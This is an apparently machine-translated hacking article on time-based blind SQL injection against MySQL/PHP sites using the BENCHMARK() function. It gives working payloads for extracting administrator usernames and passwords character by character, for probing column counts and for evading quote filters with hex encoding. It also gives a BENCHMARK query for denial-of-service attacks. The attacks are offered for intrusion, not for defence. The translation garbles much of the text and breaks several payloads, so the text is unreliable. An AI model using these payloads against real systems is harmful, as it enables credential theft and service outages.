Time Difference with MYSQL database injection game

Shangjia technical article

The main idea of this article is to add the execution time extension function to the constructed statement. If the judgment we submit is correct, the MYSQL query time will be postponed, if the submitted judgment is correct, the time delay function will not be executed, and the query statement will not be postponed, so that we can judge the injection. The BENCHMARK (count, expr) BENCHMARK () function repeats the countTimes execution expression expr, which can be used to time how fast MYSQL processing expressions are. The result value is always 0. Intended for MYSQL customers, it reports the query execution time. MYSQL> select BENCHMARK (1000000, encode ("hello", "goodbye"); + -------------------------------------------- + | BENCHMARK (1000000, encode ("hello", "goodbye") |
+ Duration + | 0 | + ---------------------------------------------- + 1 row in set (4.74 sec) The report time is the client time, not the CPU time on the server. It may be wise to execute BENCHMARK () several times, and note that the server load has multiple re-interpretation results. As long as we set the Count parameter to a greater value, the execution time will become longer. Let's take a look at the effect of execution in MYSQL: MYSQL> select md5 (& apos; test & apos;); + ---------------------------------- +
| Md5 (& apos; test & apos;) | + -------------------------------- + | hour | + hour + 1 row in set (0.00 sec) <----------- the execution time is 0.00 sec MYSQL>
Select BenchMark (500000, md5 (& apos; test & apos;); + ------------------------------------ + | BenchMark (500000, md5 (& apos; test & apos;) |
+ ------------------------------------ + | 0 | + ------------------------------------ + 1 row in set (6.55 sec) <------------ the execution time is 6.55 sec. It can be seen that the time for executing 500000 times with BenchMark is significantly longer than the normal execution time. First, let's look at a simple PHP code: ------------------------------------------------------------------------------ the structure and content of the Injection database of the producer database are as follows: # database: 'injection '# TABLE structure 'Article' create table 'Article' ('articleid' int (11) not null auto_increment, 'title' varchar (100) not null default & apos; & apos;, 'content' text not null, primary key (' Articleid ') TYPE = MyISAM AUTO_INCREMENT = 3; # export the data in the table 'Article' insert into 'Article' VALUES (1, & apos; I am a child who does not like reading books & apos;, & apos; laalalalalalalalalal! Yayayayayayay! & Apos ;);
Insert into 'Article' VALUES (2, & apos;
I hate you & apos;, & apos; I hate you. What are you? & apos ;);
# Tables # TABLE structure 'user' create table 'user' ('userid' int (11) not null auto_increment, 'username' varchar (20) not null default & apos; & apos;, 'Password' varchar (20) not null default & apos;
& Apos;, primary key ('userid') TYPE = MyISAM AUTO_INCREMENT = 3;
# Export the data in the table 'user' insert into 'user' VALUES (1, & apos; angel & apos;, & apos; mypass & apos ;); insert into 'user' VALUES (2, & apos; 4 ngel & apos;, & apos; mypass2 & apos ;);
The Code simply checks whether the query result exists. Assume that Display_errors = Off has been set. We cannot directly output sensitive information by replacing the Union select statement (this is not to say that Union is not used because subqueries are not supported in MYSQL ), or the injection is determined based on the difference returned by the error message. We use the Union union query to insert the BenchMark function statement to determine the injection: id = 1 Union select 1, BenchMark (500000, md5 (& apos; test & apos ;)), 1 from user where userid = 1 and ord (substring (username, 1, 1 )) = 97/* The preceding statement can be used to guess whether the Ascii value of the first letter of the Userid 1 is 97. If it is 97, the above query will be delayed due to BenchMark.
If it is not 97, there will be no latency, so that we can finally guess the Administrator's username and password. Script kiddies: You should note that here is a tips: use the "& apos;" in BenchMark (500000, md5 (& apos; test & apos, this is very dangerous, because the administrator can set it to filter it to cause injection failure. Here, Test can be represented in other hexadecimal notation, such as hexadecimal notation, this method is more suitable for Common Intrusion environments. The final constructed URL is as follows: http: // 127.0.0.1/test/show. php? Id = 1% 20 union % 20 select % 201, BenchMark (500000, md5 (0x41 )), 1% 20 from % 20 user % 20 where % 20 userid = 1% 20and % 20ord (substring (username, 97%) = 20/* slow execution
The Ascii value of the first letter of the username whose Userid is 1 is 97. Script kiddies: when using Union Select, we must know the number of fields in the original statement query table. In the past, we used to judge based on the error message, 1 "is continuously increased by 1. If the number of fields is correct, the returned result will be normal without errors, but this method cannot be used now, so we can use BenchMark (). We construct the statement as follows: "Union select BenchMark (500000, md5 (0x41 ",
Then increase by 1. When the number of fields is correct, BenchMark () is executed, and a delay occurs. In this way, we can determine the number of fields. In addition to the above "Orthodox" exploitation methods, BENCHMARK can also be used for DDOS attacks. In fact, the idea is very simple. In BENCHMARK (count, expr), we only need to set a large enough Count (execution times) to cause DOS attacks. In other words, if we submit a request using a proxy or other methods at the same time, it is a DDOS attack,
The database will soon fail (but the premise is that injection can be performed ). The statement can be constructed as follows: http: // 127.0.0.1/test/show. php? Id = 1% 20 union % 20 select %, BenchMark (99999999, md5 (0x41) This article references some foreign information (http://www.ngssoftware.com/papers/HackproofingMYSQL.pdf ), in fact, the method of using time difference for injection in MSSQL injection has been applied, but the function used is different (see http://www.ngssoftware.com/papers/more_advanced_ SQL _injection.pdf ). For general Injection of MYSQL + PHP (such as the use of Union), refer to Angel's article "SQL Injection with MYSQL".